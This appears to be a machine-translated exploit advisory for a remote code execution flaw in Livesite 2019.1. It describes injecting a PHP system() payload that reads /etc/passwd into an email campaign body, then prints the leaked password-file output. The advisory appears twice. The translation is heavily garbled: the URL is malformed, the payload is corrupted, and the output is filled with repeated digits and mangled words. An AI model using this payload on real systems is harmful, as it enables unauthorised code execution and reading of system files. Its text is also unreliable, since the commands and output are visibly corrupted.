##利用标题: Livesite版本: 2019.1广告系列远程代码执行
### date: 2024-1-9
###利用作者: TMRSWRR
###类别: WebApps
###供应商HomePage: https://livesite.com/
###版本: 2019.1
###在: https://www.softaculous.com/apps/cms/livesite上测试
1)登录使用管理员信用单击活动创建广告系列选择格式纯文本,在正文中写入有效载荷: 3https://127.0.0.0.1/livesite/livesite/livesite/add_email_campaign.php
有效载荷
hp Echo System('cat /etc /passwd');
2)保存后,您将看到结果:
结果: root:x:0333333:root3:/root3:/bin/bash/bash bin3333333333333333333333:13333333:BIN333:BIN:/BIN333333333333:/SBIN/SBINININ DAEMON:X333333333333333333333:/sbin/nologin ADM:x333333333333333333333333:/var/var/var/adm 3:/sbin/nologin/nologin LP:x33333333333333333:/var/spool/lpd:/sbin/nologin sync333333333333333333333333333333:03:Sync3333333:/sbin3333:/bin/binc/binc shutdown3:x33333:3603360Shutdown3:/sbin:/sbin/sbin/shutdown halt:x333333333333333333333:halt33333:/sbin3360/sbin3333:/allt/sbin/sbin/halt Mail:x3333333:123:mail:/var/spool/mail:/sbin/nololigin operator333:11:113333333333:Operator333:/root:/root3360/nologin/nologin Games:x:12:1003360games3:/usr/gasmes:/sbin/sbin/nolologin ftp:x:1433333333333333333333333333333333:/vtpp user3:/var/var/vtp333333333333333333333:/nologinin/nologinin/nologin inolinin/nologinin in nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin Systemd-Network :x333333333333333333333333:Systemd网络管理:/:/:/sbin/nologin DBUS3333333333333333333333333333333333333:SYSTEM MESSS MESSS MESSS MESS MESSES MESSE MESSE MESSE BUS 33:/SBININ NOGIN/SBINININ/NOGIN NOGIN NOGIN/NOGIN NODININ NODININ/polkitd:x333333333:997:user用于Polkitd3:/:/:/sbin/sbin/nologin tss333333333333333:59333333333333333:account,用Trousers用Trousers包装TCS TCD使用DAEMON3:/DEV/NULL:/SBIN/NOLOGIN SSHD:X33333333333333333333333333333RIVILIVILEGE SSH:/var/var/var/varr/emptle/empty/ship/sshd:/sbin/nologin postfix:x:89:89:/var/spool/postfix:/sbin/nologin chrony:x:997:995:/var/lib/chrony:/sbin/nologin SOFT:X33333333333333333333:/home/home/soft:/sbin/sbin/nologin saslauth3333333333:996333:760763360saslauthd sasslauthd user:/run/run/runol/sass nolog/sass nolog/sass nolog/sass nolog/sbauth nolog sbala nolot mailnull:x:47:47:/var/spool/mqueue:/sbin/nologin smmsp:x:51:51:/var/spool/mqueue:/sbin/nologin EMPS:X3333333333333333333333333:/home/emps3:/bin/bash命名为33:2533333333:253333:Named33: Named3:/var/var/ver nater/ver new :/nologin/nologin exim:x:93:93:/var/spool/exim:/sbin/nologin vmail:x:5000:/var/local/vmail:/bin/bash pinguzo:x:9923:/etc/pinguzo:/bin/false webuzo:x:987:987:/home/webuzo:/bin/bash apache:x:986:985:/home/apache:/sbin/nologin mysql:x:27:27:27:MySQL server:/var/lib/mysql:/bin/false mysql3:x3:27333:273:mysql server:/var/lib/lib/mysql3:/bin/false
### date: 2024-1-9
###利用作者: TMRSWRR
###类别: WebApps
###供应商HomePage: https://livesite.com/
###版本: 2019.1
###在: https://www.softaculous.com/apps/cms/livesite上测试
1)登录使用管理员信用单击活动创建广告系列选择格式纯文本,在正文中写入有效载荷: 3https://127.0.0.0.1/livesite/livesite/livesite/add_email_campaign.php
有效载荷
hp Echo System('cat /etc /passwd');2)保存后,您将看到结果:
结果: root:x:0333333:root3:/root3:/bin/bash/bash bin3333333333333333333333:13333333:BIN333:BIN:/BIN333333333333:/SBIN/SBINININ DAEMON:X333333333333333333333:/sbin/nologin ADM:x333333333333333333333333:/var/var/var/adm 3:/sbin/nologin/nologin LP:x33333333333333333:/var/spool/lpd:/sbin/nologin sync333333333333333333333333333333:03:Sync3333333:/sbin3333:/bin/binc/binc shutdown3:x33333:3603360Shutdown3:/sbin:/sbin/sbin/shutdown halt:x333333333333333333333:halt33333:/sbin3360/sbin3333:/allt/sbin/sbin/halt Mail:x3333333:123:mail:/var/spool/mail:/sbin/nololigin operator333:11:113333333333:Operator333:/root:/root3360/nologin/nologin Games:x:12:1003360games3:/usr/gasmes:/sbin/sbin/nolologin ftp:x:1433333333333333333333333333333333:/vtpp user3:/var/var/vtp333333333333333333333:/nologinin/nologinin/nologin inolinin/nologinin in nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin Systemd-Network :x333333333333333333333333:Systemd网络管理:/:/:/sbin/nologin DBUS3333333333333333333333333333333333333:SYSTEM MESSS MESSS MESSS MESS MESSES MESSE MESSE MESSE BUS 33:/SBININ NOGIN/SBINININ/NOGIN NOGIN NOGIN/NOGIN NODININ NODININ/polkitd:x333333333:997:user用于Polkitd3:/:/:/sbin/sbin/nologin tss333333333333333:59333333333333333:account,用Trousers用Trousers包装TCS TCD使用DAEMON3:/DEV/NULL:/SBIN/NOLOGIN SSHD:X33333333333333333333333333333
RIVILIVILEGE SSH:/var/var/var/varr/emptle/empty/ship/sshd:/sbin/nologin postfix:x:89:89:/var/spool/postfix:/sbin/nologin chrony:x:997:995:/var/lib/chrony:/sbin/nologin SOFT:X33333333333333333333:/home/home/soft:/sbin/sbin/nologin saslauth3333333333:996333:760763360saslauthd sasslauthd user:/run/run/runol/sass nolog/sass nolog/sass nolog/sass nolog/sbauth nolog sbala nolot mailnull:x:47:47:/var/spool/mqueue:/sbin/nologin smmsp:x:51:51:/var/spool/mqueue:/sbin/nologin EMPS:X3333333333333333333333333:/home/emps3:/bin/bash命名为33:2533333333:253333:Named33: Named3:/var/var/ver nater/ver new :/nologin/nologin exim:x:93:93:/var/spool/exim:/sbin/nologin vmail:x:5000:/var/local/vmail:/bin/bash pinguzo:x:9923:/etc/pinguzo:/bin/false webuzo:x:987:987:/home/webuzo:/bin/bash apache:x:986:985:/home/apache:/sbin/nologin mysql:x:27:27:27:MySQL server:/var/lib/mysql:/bin/false mysql3:x3:27333:273:mysql server:/var/lib/lib/mysql3:/bin/false
